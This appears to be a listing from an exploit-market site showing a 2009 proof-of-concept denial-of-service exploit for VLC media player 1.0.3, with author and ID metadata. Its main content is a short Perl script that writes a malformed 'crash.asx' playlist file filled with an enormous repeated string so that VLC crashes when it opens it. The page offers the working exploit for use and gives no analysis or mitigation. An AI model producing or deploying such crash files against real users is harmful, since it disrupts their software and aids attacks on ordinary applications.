[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

VLC v1.0.3 Denial of Service PoC

Author
D3V!L FUCKER
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-9815
Category
dos / poc
Date add
31-12-2009
Platform
unsorted
================================
VLC v1.0.3 Denial of Service PoC
================================

# Title: VLC v1.0.3 Denial of Service PoC
# EDB-ID: 10840
# CVE-ID: ()
# OSVDB-ID: ()
# Author: D3V!L FUCKER
# Published: 2009-12-31
# Verified: yes

view source
print?
#!/user/bin/perl
# Author: [D3V!L FUCKER]
# Tested on: [windows vista sp0]
# Code :
my $file= "crash.asx";
 
my $boom= "http://"."AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" x 500000;
 
open($FILE,">>$file");
 
print $FILE "$boom";
 
close($FILE);
 
print "Done..!~#\n";



#  0day.today [2024-11-15]  #